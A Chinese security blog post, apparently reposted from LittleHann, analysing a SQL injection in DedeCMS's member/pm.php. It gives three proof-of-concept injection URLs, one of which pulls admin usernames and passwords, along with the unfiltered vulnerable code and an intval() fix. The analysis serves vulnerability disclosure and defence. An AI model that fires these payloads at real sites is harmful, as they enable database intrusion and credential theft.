zoukankan      html  css  js  c++  java
  • dedecms /member/pm.php SQL Injection Vul

    catalog

    1. 漏洞描述
    2. 漏洞触发条件
    3. 漏洞影响范围
    4. 漏洞代码分析
    5. 防御方法
    6. 攻防思考

    1. 漏洞描述

    Dedecms会员中心注入漏洞

    Relevant Link

    http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html


    2. 漏洞触发条件

    0x1: POC1

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%20%23

    0x2: POC2

    如果报错: Safe Alert: Request Error step 1 !

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2+/*!50000Union*/+/*!50000select*/+1,2,3,4,5,6,userid,8,9,10,11,pwd+from+`%23@__admin`%23

    0x3: POC3

    报错注入

    http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′ and @' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    Relevant Link

    http://www.myhack58.com/Article/html/3/62/2014/42255.htm


    3. 漏洞影响范围
    4. 漏洞代码分析

    /member/pm.php

    else if($dopost=='read')
    {
        $sql = "SELECT * FROM `#@__member_friends` WHERE  mid='{$cfg_ml->M_ID}' AND ftype!='-1'  ORDER BY addtime DESC LIMIT 20";
        $friends = array();
        $dsql->SetQuery($sql);
        $dsql->Execute();
        while ($row = $dsql->GetArray()) 
        {
            $friends[] = $row;
        }
        //$id注入
        $row = $dsql->GetOne("SELECT * FROM `#@__member_pms` WHERE id='$id' AND (fromid='{$cfg_ml->M_ID}' OR toid='{$cfg_ml->M_ID}')");//ID没过滤
        if(!is_array($row))
        {
            ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
            exit();
        }
        //$id注入
        $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE id='$id' AND folder='inbox' AND toid='{$cfg_ml->M_ID}'");
        $dsql->ExecuteNoneQuery("UPDATE `#@__member_pms` SET hasview=1 WHERE folder='outbox' AND toid='{$cfg_ml->M_ID}'");
        include_once(dirname(__FILE__).'/templets/pm-read.htm');
        exit();
    }

    Relevant Link

    http://0day5.com/archives/1313


    5. 防御方法

    /member/pm.php

    else if($dopost=='read')
    {
        $sql = "Select * From `#@__member_friends` where  mid='{$cfg_ml->M_ID}' And ftype!='-1'  order by addtime desc limit 20";
        $friends = array();
        $dsql->SetQuery($sql);
        $dsql->Execute();
        while ($row = $dsql->GetArray()) 
        {
            $friends[] = $row;
        }
        /* $id过滤 */
        $id = intval($id);
        /* */ 
        $row = $dsql->GetOne("Select * From `#@__member_pms` where id='$id' And (fromid='{$cfg_ml->M_ID}' Or toid='{$cfg_ml->M_ID}')");
        if(!is_array($row))
        {
            ShowMsg('对不起,你指定的消息不存在或你没权限查看!','-1');
            exit();
        }
        $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where id='$id' And folder='inbox' And toid='{$cfg_ml->M_ID}'");
        $dsql->ExecuteNoneQuery("Update `#@__member_pms` set hasview=1 where folder='outbox' And toid='{$cfg_ml->M_ID}'");
        include_once(dirname(__FILE__).'/templets/pm-read.htm');
        exit();
    }


    6. 攻防思考

    Copyright (c) 2015 LittleHann All rights reserved

  • 相关阅读:
    如何调试在OJ中的代码
    在linux命令行中调试在OJ上的c++代码
    jar包
    stanford core
    decode encode
    访问服务器,远程访问linux主机
    代码18
    删除列表中的元素
    if __name__ == '__main__'
    苹果要求全部新app以及版本号更新必须支持iOS 8 SDK和64-bit
  • 原文地址:https://www.cnblogs.com/LittleHann/p/4519096.html
Copyright © 2011-2022 走看看